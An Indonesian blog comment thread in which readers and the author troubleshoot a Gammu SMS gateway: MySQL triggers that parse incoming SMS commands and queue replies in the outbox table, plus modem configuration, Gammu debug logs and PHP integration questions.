“CREATE TRIGGER infonilai AFTER INSERT ON outbox”, seharusnya “CREATE TRIGGER infonilai AFTER INSERT ON inbox”, mudah2an tidak mengganggu skrip anda.

ok, kita umpamakan anda memiliki format SMS spt ini.

INFO#Student_id#mata_kuliah ;

detail :
INFO : keyword “info” merupakan keyword universal yang akan menjadi keyword pengecekan fungsi format SMS kita. Dan saya sarankan untuk keyword universal jangan terlalu kebanyakan karakternya. Maximal 6 karakter contoh “INFO”, “REG”, “REQ” dll. Mengapa ini dibatasi?? Jika memang dimungkinkan standar key universal semua jumlah karakter sama, krn ini berkaitan dengan penggunaan fungsi SUBSTRING di MySQL.

Student_id : keyword yg merupakan primary_key untuk mengambil data ke tabel lain, tentunya ke tabel mahasiswa pada contoh disini. Ini juga kalo bisa di standarkan jumlah karakternya. Misalkan ada disebuah kampus punya standar IDSTUDENT/NRP : “99511034″ atau “MHS234″, jika bisa dimungkinkan jumlah karakter semua mahasiswa/siswa di batasi karakternya. MISAL: maximal 8.

mata_kuliah: keyword yang merupakan primary_key untuk mengambil data ke tabel mata kuliah. Dan sama dengan keyword student_id, kalo bisa ini di batasi… misal:
Mata kuliah Jaringan Komputer : JRKM, JARKOM
Mata kuliah Kalkulus : KALK, KLKLUS
dan seterusnya.

pembatasan ini berkaitan dengan penggunaan substring mysql. karena ketika kita membuat sebuah kondisi di trigger yang jumlah karakternya tidak sesuai pada fungsi substring, otomatis data yang akan di minta tidak akan masuk ke tabel “outbox”.

Sekilas ttg fungsi SUBSTRING. coba kita lihat ke manual MYSQL di sini >> http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_substring

SUBSTRING bertujuan memecah format SMS yang masuk ke inbox.
misalkan
NEW.TextDecoded = “INFO#99511017#JRKM” (tanpa tanda kutip)
maka:
SUBSTRING(NEW.TextDecoded,6,8) => “99511017″ diambil mulai karakter ke 6 dan mengambil 8 karakter dari keyword.
SUBSTRING(NEW.TextDecoded, 15,4) => “JRKM” diambil dari karakter 15 dan diambil hanya 4 karakter saja.

Jadi jika kita melakukan select spt ini…

SELECT nilai FROM nilai_mahasiswa WHERE student_id = SUBSTRING(NEW.TextDecoded,6,8) ; kita akan mendapatkan query spt ini.
SELECT nilai FROM nilai_mahasiswa WHERE student_id = 99511017;

Begitu juga dengan Karakter “JRKM”.

Kesimpulan, jika kita memiliki format SMS spt ini…
INFO#99511017#JRKM (nilai jarkom untuk id 99511017)

delimiter //
CREATE TRIGGER info_nilai AFTER INSERT ON inbox
FOR EACH ROW BEGIN
insert into outbox values (”,”,”,”,NEW.SenderNumber,’Default_No_Compression’,”,
‘-1′,(SELECT nilai_value FROM nilai_mahasiswa
WHERE mata_kuliah = SUBSTRING(NEW.TextDecoded,15,4) AND
student_id=SUBSTRING(NEW.TextDecoded,6,8), ”,’false’,’-1′,”,”,”,”);
END;
//Delimiter;

dan untuk itu coba lihat manual substring di mysql website. Mudah2an membantu. Maaf jika kurang jelas.

ota March 21st, 2008 at 9:10 pm

oke deh makasih ya mas atas bantuannya…
ntarta coba untuk aplikasikan tutorial dari anda…

ota March 22nd, 2008 at 8:43 pm

mysql> delimiter $$
mysql> CREATE TRIGGER infonilai AFTER INSERT ON inbox
-> FOR EACH ROW BEGIN
->if SUBSTRING(NEW.TextDecoded,1,6)=’NILAI’ then
-> insert into outbox (InsertIntoDB,SendingDateTime,DestinationNumber,Coding
,TextDecoded,SendingTimeOut,DeliveryReport) values (now(),now(),NEW.SenderNumber
,’Default_No_Compression’,(SELECT nilai_value FROM nilai_mahasiswa WHERE nama=SU
BSTRING(NEW.TextDecoded,7,6)),now(),’yes’);
->else
-> insert into outbox (InsertIntoDB,SendingDateTime,DestinationNumber,Coding
,TextDecoded,SendingTimeOut,DeliveryReport) values (now(),now(),NEW.SenderNumber
,’Default_No_Compression’,'format sms yang anda kirim salah’,now(),’yes’);
->end if;
-> END$$

maaf mas balik lagi masih aga bngung ni..kemarin udah ta coba tanpa logika if else datanya sudah berhasil saya tampilkan di outbox..tapi ketika saya tambahin if else ko ga bisa muncul lagi ya di outboxnya….?script yang saya pkai seprti yang di atas…
dan format yang saya gunakan seperti ini..

nilai#student_id#nama

oh iya mas apa kita hanya bisa ambil satu data aja dari tabel nilai?masalahnya kemarin udah ta coba masukkan nilai ama nama ga bisa..?
misalnya:

(SELECT nilai_value,nama FROM nilai_mahasiswa WHERE nama=SUBSTRING(NEW.TextDecoded,7,6))

dan apabila kita ingin menambahkan kalimat didepan (SELECT nilai_value FROM nilai_mahasiswa WHERE nama=SUBSTRING(NEW.TextDecoded,7,6)) ko g bisa ya mas?
seperti ini misalnya:

nama ‘nama’ nilai anda adalah: ‘nilai_value’;

jadi data yang ingin kita masukkan ke tabel outbox seperti itu bisa g mas?
kemarin udah ta coba tapi masih error mas…

thanks so much atas bantuannya mohon pencerahan….

miftahsteven March 24th, 2008 at 10:45 am

apabila format sms kamu spt ini…
nilai#student_id#mata_kuliah;
coba kondisikan spt ini
IF substring(NEW.TextDecoded,1,5) = ‘NILAI’ THEN
–query insert ke tabel outbox dan ambil data ke table nilai_mhs;
END IF;
IF substring(NEW.TextDecoded,1,5) = ” THEN
–query insert ke tabel outbox :: textdecoded = ‘format sms yang anda masukan salah’;
END IF;

artinya coba buat kondisinya per IF / END IF;

yang kedua…
untuk mengambil data nama dan nilai_value jgn kamu jadikan satu query…, krn data yang kita input memerlukan query yang menghasilkan 1 data record saja. Kalau pun membutuhkan record yang lain, lakukan query lagi setelah statement query pertama.

Untuk mempermudah penyatuan data mahasiswa dan data nilai mata kuliah, coba kamu buat view untuk mempermudah query kamu.

Yang ketiga…
untuk menambah kata2, “NAMA nilai anda adalah : 45.33″, coba kamu gunakan fungsi CONCAT mysql. CONCAT itu dapat memberikan output string sesuai dengan yang di inginkan.

MISAL : SELECT CONCAT(’nama’, nama_mhs, ‘nilai anda adalah :’, nilai_value) FROM nilai WHERE student_id = SUBSTRING(NEW.TextDecoded,7,6) ;

coba kamu lihat manual concat di mysql manual. :D semoga membantu yaah….

ota March 24th, 2008 at 9:51 pm

IF substring(NEW.TextDecoded,1,5) = ‘NILAI’ THEN
–query insert ke tabel outbox dan ambil data ke table nilai_mhs;
END IF;
mas dalam script saya yang diatas khan udah ta buat seperti itu tapi ifnya menggunakan huruf kecil apa itu berpengaruh/case sensitif mas?

dan maksudnya concat substring itu apa mas…
masalhnya kemarin udah baca” tapi belum faham maksudnya..

thanks banget ya mas udah banyak membantu..

miftahsteven March 25th, 2008 at 11:18 am

coba telusuri posting forum mysql di :
http://forums.mysql.com/read.php?99,166563,166563

setahu saya tidak dibedakan if atau IF.
concat mysql itu bertujuan menyatukan string yg kita inginkan dengan data keluaran dari field yang kita inginkan. Untuk penggunaan perinta concat coba kamu lihat mysql function manual di :
http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_concat

semoga membantu ya..
dan jangan bosen bertanya… thx

-agit- March 27th, 2008 at 2:40 pm

mas..
gni loh..
pertanyaan aq g susah2 lh….
hp sudah terkoneksi, identify gammu sudah trlaksana dgn lancar…
masalahnya, di aktivasi saya sepertinya tidak berhasil…

satu lagi yang mau saya tanyakan, bagaimana cara mengirimkanpesan. saya sudah coba dengan cara menginsert data ke table outbox, tapi tidak berhasil…
apa saya salah mengisi fieldnya..??
tolong bantuuannya mas…

_alny saya berencana mengangkat judul ini untuk skripsi saya. makasih… :)

miftahsteven March 27th, 2008 at 3:19 pm

coba cek setelah command gammu –identify,
bisa jadi ternyata belum mendapatkan hasil yg seharusnya…
coba cek IMEI number,port modem dan Tipe Koneksinya di hasil identifikasi commandnya.

Tapi kalo memang bener² menurut anda identifikasinya sempurna, dan bermasalah dengan aktivasi commandnya…
coba cek settingan databasenya di file smsdrc. Cek apa sudah benar atau belum. Karena kalo salah, gammu tidak akan terkoneksi dengan database.

untuk mengirimkan sms, kita coba insert data ke tabel outbox insert ke field DestinationNumber dan TextDecoded. Dan set Field Coding ke ’Default_No_Compression’

Untuk kirim SMS, kita harus berhasil mengaktifkan server gammu, kalo berhasil konsol nya jangan ditutup, biarkan gammu aktif cukup di minimize di desktop.

Biasanya setelah aktivasi server, data sms dari modem, semuanya masuk ke database mysql. dan juga ditandai, semua sms di modem terhapus. (move data sms)

semoga membantu.

ota April 4th, 2008 at 9:43 pm

balik lagi mas….

kemarin udah ta coba semua mas maksh bangt udah berhasil mas…tapi ada masalah baru lagi mas…
jadi istilahkan saja ada tabel khusus untuk berita..
tabel berita misalnnya berisi ID,Berita nah ketika kita insertkan data berita baru ke tabel berita semua member yang telah registrasi terkirimi oleh berita baru kita itu…jadi kita ambil phone numbernya dari tabel member yang berisi ID,PhoneNumber,NIM,Nama misalkan jumlah member kita 20an gt…jadi member itu langsung mendapat info baru yang kita insertkan ke tabel berita tadi gt…

terus yang kedua untuk mengenai auto refresh di php yang menggunakan timer mas…
saya udah coba gunakan meta tapi malah refresh terus scriptnya seperti ini mas:

maksih b 4na….

miftahsteven April 10th, 2008 at 12:53 pm

kalo gitu coba buat trigger auto insert ke outbox aja. Tapi kali ini triggernya dibuat AFTER INSERT tabel_news. bgitu kali pak.

maaf baru bales…

kalo belum jelas silahkan tanya lagi.

Pake ajax autorefresh.

ota April 10th, 2008 at 9:40 pm

oke deh mas thanks banget…
o iya untuk yang pake ajak contoh scriptnya seperti apa mas…?

sigit April 12th, 2008 at 11:18 am

mass aq ada masalah pake gammu saya pake gammu versi 1.18.0 hp saya kedetek trus waktu kujalankan smsdnya mau jalan

tapi waktu saya kirim sms ke yang terkonek PC saya gammunya langsung error
keluar error dari microsoft. dan gammu berhenti

trus waktu kucoba kirim sms dari tabel outbox kuisikan DestinationNumber,TextDecoded bisa terkirim cuma masalahnya
sms yang masuk kok SMS KOSONG.table outbox kosong masuk ke tabel SentItems.

sigit April 12th, 2008 at 11:19 am

oya lupa HP yang saya gunakan siemens C55.terima kasih atas bantuannya

ota May 13th, 2008 at 3:54 pm

mas tanya lagi mas..
ma,f banget ya mas kalo menggangu kesibuknnya..
yang kemarin terimaksih banget mas tutorialnya..
tapi gimana caranya mas supaya perintah-perintah seperti

nilai#student_id#mata_kuliah;

bisa kita customize tanpa kita masuk ke triggernya intinya kita buat dinamis mas…
thanks b 4 na..
sorry mas ty truz..cz msh shochk..

lilaa June 24th, 2008 at 11:17 am

mas… aq binggung bgt browse sms inboxnya gmn??
aq cuman bisa ngirim doank
ngeliat sms masuk ke database gak isa??

gimna caranya?

miftahsteven June 24th, 2008 at 11:53 am

coba dicek database gammu nya. Karena secara logis apabila anda sudah bisa berkirim SMS, anda harusnya sudah bisa memperoleh SMS yang terkirim ke modem setelah command “gammu —smsd MYSQL smsdrc” .

Heri June 24th, 2008 at 4:47 pm

boz, saya tuh bikin aplikasi di php + pake trigger di mysqlnya.

kenapa pas dijalanin dari program yg saya bwt, smsnya ga nyampe. jadi pesennya itu cuman nyampe outbox aja. ga masuk ke sent item. bukannya ketika pesan masuk outbox akan secara otomatis masuk ke sent item?
tapi kalo mengirim pesan langsung dari mysql bisa nyampe ke hp tujuan…

kira2 letak salah saya dimana ya?

thx

miftahsteven June 25th, 2008 at 1:25 pm

Coba cek skrip php di bagian insert ke tabel outbox, mungkin ada beberapa field yang belum di set valuesnya…, kalo memang mau di biarkan null, beri saja kutip kosong (”)…
atau bisa jadi php connectionnya belum mengarah ke database gammu.., ini sptnya masalah di PHP scriptnya. Krn gammunya sudah bisa berkirim sms ya tho…

semoga membantu…

HR July 1st, 2008 at 11:14 am

Mas miftah yang budiman, baik hati dan tidak sombong .. saya ingin bertanya .. “Kapan kah mas miftah membayar utang?” …

Maklum mas, sekedar mengingatkan saja, sudah hampir 2 tahun loh mas …

Xixixixixi

iRene July 10th, 2008 at 10:50 am

Mas mau tanya klo setelah saya jalankan command
gammu –smsd MYSQL smsdrc

hasilnya seperti ini :

41A : 54T:2B+: …..
1 “At+CPIN?”
2 “+CPIN:READY”
RECEIVED frame type 0×00/length 0×19/25
41A : 54T:2B+: …..
Security status received - nothing to enter
1 “OK”
RECEIVED frame type 0×00/length 0×04/4
4FO:4BK:0D:0A
UPDATE ‘phones’ SET ‘TimeOut’ = (NOW() + INTERVAL 10 SECOND)+) WHERE ‘IMEI’ =’354350009355467′
Getting security code status
SENDING frame type 0×00/length 0×09/9

muncul berulang2 sampai ga ada berhenti2nya sampai berjam2, kira2 itu yg salah apa yah? aau memang hasilnya harusnya seperti itu? Mohon pencerahannya :D. Thx before

miftahsteven July 10th, 2008 at 10:59 am

ya memang harusnya spt itu, itu adalah proses dimana gammu harus mengupdate terus keadaan modem gsm. Mungkin akan berulang-ulang. Jadi jangan ditutup windows command promptnya.

semoga membantu.

nb: tp coba dicek juga apa sms di modem sudah masuk ke database mysql smsd?? kalo belum , itu artinya proses di konsol cmdprompt yang berulang-ulang itu merupakan proses error gammu.

jerry August 12th, 2008 at 11:28 am

trimakasih mas ats artikel nya karna membantu sekali buat saya.ada beberapa kendala yang saya temukan dalam melakukan pengiriman sms..kata yang saya send tidak sama dengan kata yang di terima oleh penerima sms..saya sudah menginsert destinationnumber dan textdecode..namun hasil nya sama..kata nya berubah menjadi karakter aneh ketika sampai kepada si penerima pesan..lalu..sms yang sampai tidak bisa masuk inbox dalam artian hanya bersifat flash sms ..mohon kesediaan mas dapat memberikan pemecahan masalah yang saya temukan tersebuut..sebelum nya saya ucapkan trimakasih dan smoga sukses slalu buat mas..amin

miftahsteven August 12th, 2008 at 11:50 am

permasalahan mas jerry sepertinya ada di field “Coding” pada table Outbox. Untuk mengirimkan pesan karakter2 standar coba set ke ‘Default_No_Compression’. Kemungkinan karakternya berubah ke karakter UTF.

Untuk menggunakan type/jenis sms, anda bisa mengubah-ngubah sesuai keinginan anda. Adanya di field “Class” pada table Outbox. Secara default seharusnya field class akan terisi angka ‘-1′ artinya sms secara default akan bertipe no flash sms.
Mungkin bisa jadi pada saat mas jerry menginput ke field “class”, terisi value bernilai ‘1′, krn value di set ke angka 1 pada field class artinya sms terkirim berjenis FLASH sms..

semoga membantu..
Correct Me If Im wrong :)

firdaus August 13th, 2008 at 11:25 am

aku da coba tutorial diatas, tp ketika q ketik gammu –smsd MYSQL smsdrc, memang bisa jalan di DOS, tapi kadang-kadang terputus-putus (langsung kembali di C:\win32), tapi kadng2 normal. masalahnya tutorial yg Q baca pokoknya perintah diatas tadi jalan maka semua inbox sms yg ada di HP akan masuk ke tabel inbox gammu ??? tapi punya Q kok g bisa ???? aku cb kirim lewat outboxnya juga g bisa padhal service smsd gammunya tetap hidup ???, tapi kadang2 bisa ngirim tapi saat diterima oleh HP lain isinya kosong tidak ada messagenya, pdhal di outbox gammu colom textcodenya da Q isi pesan,field conding uda ‘Default_No_Compression’, dan class juga uda -1

mohon bantuannya secepatnya ..

Q paake windows server 2003, modem HP Nokia N30, wampserver terbaru dan gammu spt diatas

trims to all

firdaus August 13th, 2008 at 11:32 am

punya Q juga sma kyk maslhnya IRENE, smsd gamuu berulang2 terus tapi isi sms di HP koq gak masuk di inboxnya gammu ..??? kenapa bisa begitu ???

padahal saat q lihat di phpmyadmin milik wamp server di bagian SHOW PROCESSLISTnya database sms jalan :

Show Full Queries ID User Host Database Command Time Status SQL query
Kill 158 root localhost:3336 sms Sleep 0 — —
Kill 193 root localhost:3500 None Sleep 0 — —
Kill 194 root localhost:3501 mysql Query 0 — SHOW PROCESSLIST

kata mas miftah kan klo berulang2 terus mgk proses di konsol cmdprompt yang berulang-ulang itu merupakan proses error gammu. trus solusinya spt apa ???

aku cb versi gammu 1.17, malah lgs balik ke C:\ pdhl belum aku tekan Ctrl+C

mhn bantuanya

firdaus August 13th, 2008 at 11:41 am

isi setting file gammurc Q :

[gammu]

port = com1:// aku gunakan port com1
#model = 6110 // type hp q modem N30 jdi modelnya tidak spt HP pd umumnya
connection = at19200 //aku lihat di device manager maximum 115200 tapi q baca di web gammu utk N30 connection pake at19200 jd q ubah settingan hardwarenya
#synchronizetime = yes
#logfile = gammulog
#logformat = textall
#use_locking = yes
#gammuloc = locfile
#startinfo = yes
#gammucoding = utf8
#rsslevel = teststable
#usephonedb = yes

//script [gammu1] Q gak tau jadi q biarkan, maksudnya apa ?? apa di isi spt script[gammu]

[gammu1]

port = com8:
#model = 6110
connection = fbusblue
#synchronizetime = yes
#logfile = gammulog
#logformat = textall
#use_locking = yes
#gammuloc = locfile
#startinfo = yes
#gammucoding = utf8

————settingan file smsdrc Q :
user = root // qpake user root
password = //passwordnya tdk aku beri
pc = localhost // pake localhost
database = sms // database aku buat di wamp server versi baru yaitu versi mysql 5.0.51 php 5.2.6 dan apache 2.2.8 dan Q beri nama “sms” dg import file contoh mysql.sql dari gammu jadi lgs jadi beberapa table inbox,outbox dll

———————————–
tapi masalahnya tetap saja isi sms di HP tidak tampil di inbox gammu ?????????????
walaupun service smsd jalan ….!!!

firdaus August 13th, 2008 at 11:46 am

————saat aku ketik gammu –identify :

Size : 35
Getting phone SMS status
SENDING frame type 0×00/length 0×12/18
41A|54T|2B+|43C|50P|4DM|53S|3D=|22″|4DM|45E|22″|2C,|22″|4DM|45 AT+CPMS=”ME”,”ME
22″|0D “.
1 “AT+CPMS=”ME”,”ME”"
2 “+CPMS: 0,20,0,20,0,55″
3 “OK”
RECEIVED frame type 0×00/length 0×31/49
41A|54T|2B+|43C|50P|4DM|53S|3D=|22″|4DM|45E|22″|2C,|22″|4DM|45 AT+CPMS=”ME”,”ME
22″|0D |0D |0A |2B+|43C|50P|4DM|53S|3A:|20 |300|2C,|322|300|2C “…+CPMS: 0,20,
300|2C,|322|300|2C,|300|2C,|355|355|0D |0A |0D |0A |4FO|4BK|0D 0,20,0,55….OK.
0A .
SMS status received
Used : 0
Size : 20
UPDATE `phones` SET `TimeOut`= (NOW() + INTERVAL 10 SECOND)+0 WHERE `IMEI` = ‘35
0775910752149′
Getting security code status
SENDING frame type 0×00/length 0×09/9



satwika August 13th, 2008 at 9:21 pm

mas.. saya uda coba triggernya di cmd windows..
ada error kayak gini “This version of MySQL doesn’t yet support ‘multiple triggers
with the same action time and event for one table’ ” apakah karna musql saya versinya udah lama (padahal saya liat versinya 5.0.27.. apa saya perlu install yang lebih baru? saya pake Appserv 2.5.8 mas.. apa ada versi terbaru dari appserv yang ada database mysql terbaru yg support trigger? mohon jawabannya mas.. saya buat bikin TA..

miftahsteven August 14th, 2008 at 9:13 am

sepertinya kalo saya lihat errornya, mysql mendeteksi adanya trigger yang diperlakukan pada tabel yang sama. dan pada mysql versi itu tidak support untuk membuat trigger yg memperlakukan tabel yang sama.

coba di lihat dulu trigger yang ada, kalo memang sudah ada, dihapus terlebih dahulu dengan printah “DROP trigger nama_trigger”.

itu analisa awal saya, mohon di beritahu kalo saya salah.

thanks semoga membantu.

wong_gendeng August 14th, 2008 at 2:16 pm

lho masalahq sama ma punyanya mas firdaus…tolong d jawab donk

septi August 14th, 2008 at 2:41 pm

terimakasih mas atas tutorialnyya.. saya sangat senang sekali setelah baca tutorial mas, sekarang saya sudah berhasil.

tapi ada beberapa pertanyaan yang ingin saya sampaikan.

saya menggunakan nokia 9500, semua sudah berjalan lancar… tapi untuk baca sms yang ada di phone / memori( bukan di simcard ) belum berhasil.
kecuali yang ada di simcard ( langsung masuk ke database )

nah, yang ingin saya tanyakan bagaimana caranya agar isi sms yang ada di phone bisa di masukkan ke database…

saya sangat mengharapkan balasannya…

terimakasih

miftahsteven August 15th, 2008 at 2:01 pm

sepertinya ini kasus baru yaa…, mbak septi. Biasanya justru gammu mengambil semua data yang ada di memori telp. Boleh saya tahu settingan gammurc nya mungkin??

thanks

Agung September 19th, 2008 at 10:18 am

trima kasih mas atas miftah. dah diperbolehkan berkunjung dan mendemokannya smsgatewaynya . mantap banget, nanti klo punya saya selesai juga akan saya share dengan mas miftah.

miftahsteven September 19th, 2008 at 10:38 am

:P dengan senang hati. semoga bisa membantu walaupun cuma sedikit.

Agung September 25th, 2008 at 8:09 pm

saya mau tanya gemana cara menjalankan. c:\win32\gammu –identify dan c:\win32\gammu –smsc Mysql smsdrc , memalui php, jadi saya tidak haru buka command line untuk menjalankan command tersebut. mohon pencerahannya..
saya sudah menggunakan @exec(’c:\win32\gammu –smsc MYSQL smsdrc’); melalui php tapi tidak bisa jalan juga servicenya..
trimakasihhh

rey October 10th, 2008 at 11:49 am

saya menggunakan siemen c50
[gammu]
port = com10:
connection = at19200
;synchronizetime = yes
logfile = gammulog
logformat = textall
use_locking = yes
gammuloc = locfile
;startinfo = yes
gammucoding = utf8
usephonedb = yes

when i type ‘gammu –identify’ the result is :
D:\Gammu-1.21.0\bin>gammu –identify
Manufacturer : Siemens
Model : M50 (M50)
Firmware : 14
IMEI : 350810370034454
Product code : M50
SIM IMSI : 510013940307096

but when i type
D:\Gammu-1.21.0\bin>gammu –sendsms text 08174777622 there is error
‘the exception unknoen software exception (0xc00000fd) occurred in aplication location 0×004335fb. click on OK to terminate the program.

masalahnya dimana ya? makasi bantuannya

miftahsteven October 10th, 2008 at 6:35 pm

maaf baru respon. commentnya masuk ke spambox,
masalahnya mas rey sptnya ada interupt by modem. ada masalah koneksi modemnya mas rey.

cmiiw

Benny (BenS) October 13th, 2008 at 5:57 pm

Mas saya minta tuntunan belajar sms gammu dari awal donk? boleh ga mas? soalnya saya masih agak bingung untuk memahaminya. bulan lalu saya bikin projek untuk mata kuliah saya yaitu sms gateway dgn menggunakan FBUS15. saya bikin aplikasi request lagu pada radio secara otomatis dan alhamdulillah sukses, tapi masih ada kendala. aksesnya lama & harus menggunakan komputer berspeak besar. saya disarankan untuk menggunakan gammu oleh dosen saya untuk Tugas akhir saya. jadi mohon bantuannya???? Tak tunggu ya Mas? salam kenal ya Mas? Benny

Agung October 15th, 2008 at 6:18 pm

D:\Gammu-1.21.0\bin>gammu –sendsms text 08174777622 there is error
‘the exception unknoen software exception (0xc00000fd) occurred in aplication location 0×004335fb. click on OK to terminate the program.

ini coba pake “echo test sms |gammu –sendsms TEXT 08174777622″

semoga membantu

deni mulyana November 1st, 2008 at 9:38 am

trims yawh atas infonya…
w copy nih infonya…
wassalam…

dyan November 3rd, 2008 at 11:01 am

saya baru belajar php. minta tolong dong kirim coding buat form input dengan PHP untuk melakukan insert data kedalam tabel outbox. untuk kirim dan menerima sms. makasih yaa

miftahsteven November 4th, 2008 at 3:41 pm

anda tinggal gunakan NAURA SMS, sudah tinggal install dan pakai buat aplikasi sms.
semoga membantu

wijaya kusuma November 25th, 2008 at 1:02 pm

mas aku mau tanya nehh, aku bisa terimas sms tapi ngirimnya kok ngak mau yahh,,
aku hanya menginput di filed textdecode dan di destinationnumber nya aja mas…mita tolong yah mass. makasihh

miftahsteven November 25th, 2008 at 1:08 pm

harusnya udah bisa. Tp coba check di field CODING, dan itu anda isikan Default_No_Compression khan?

pulsa ready juga khan?

boim December 19th, 2008 at 11:45 pm

mas, mo nanya ni…
gammu ini mendukung database FIREBIRD ato INTERBASE ngga ye….?

Thanks 4 d’Answer:)

fathul December 31st, 2008 at 10:12 am

mskih banyak infonya. pake trigger, boleh juga. soalnya sebelumnya sy pake ajax. jd dgn ajax d lakukan proses refresh browser yg berulang-ulang. script pengecekan dgn php. emang berat sih. klo data dikit ok lah, kalo banyak ?? “cape de…h”. so thx for trigger solution. bisa di jajal neh. Ijin pake naura-nya boz.

miftahsteven December 31st, 2008 at 10:16 am

lebih bagus lg kalo trigger di mix dengan ajax. :P jadi itu ajaxnya jgn di remove.
nuhun, kalo mau develop naura jd lebih mantap pake ajax. :D

sukses mas!


Leave a Reply

Name (*) :

Email (*) :

URL :

Comment (*) :

Friday, January 09, 2009
(",)

steveFreaksides: Sisi-sisi yang terbuang. Hal-hal yang sudah tidak terpakai tidak selamanya sampah. Mungkin masih bermanfaat. Banyak hal yang anda dapat di sini, dan memang tidak begitu penting. Tapi semua yang terbuang disini bisa jadi bermanfaat buat anda. Di sisi-sisi yang terbuang inilah saya ingin berbagi.

* Advertise Now
* Advertise Now

* Advertise Now
* Advertise Now

* Recent Post
* Recent Comments
* Archives

Recent Post

* Info : List PhoneDB and Connection Type For Gammu
* “Gammu with MySQL procedure”
* “Naura SMS is available now”
* Tutorial Gammu Versi PDF
* “update freaksides”
* SMS Client Application v.2.0
* Coret²an: Array Lebih Jauh!!
* “klorofil:The PHP Desktop”
* “Futsal” (The Balls Bintaro)
* Review : www.coder.web.id : “Indonesian Hacking Community”

Recent Comments

* Kurniawan Junaidy:kok gak bisa sign in di forum
* hendra:mas...mo nanya...klo koneksi l
* Cilik:@Chandra Kharisma tq banyak
* miftahsteven:lebih bagus lg kalo trigger di
* fathul:mskih banyak infonya. pake tri
* anam:sukses ya mas
* miftahsteven:silahkan kesini mas tono.. ht
* tono:saya pake modem solomom, untuk
* syahli:mas saya mau tanya nih, alhamd
* hartono:salam sukses... mas bs ngasih

Archives

* October 2008
* September 2008
* August 2008
* June 2008
* March 2008
* February 2008

*
Links
o Conna
o Rophenk
o Blog::Ryan
o Blog::Doddie
o Milanisti
o BengkelHosting
o Coder
o Congkak
o DetikNet
o Dyudo
o My Office
o Ilmu Komputer
o Blog::Conna
o More Insect
o Novemind

*
Meta
o Login
o Valid XHTML
o XFN
o WordPress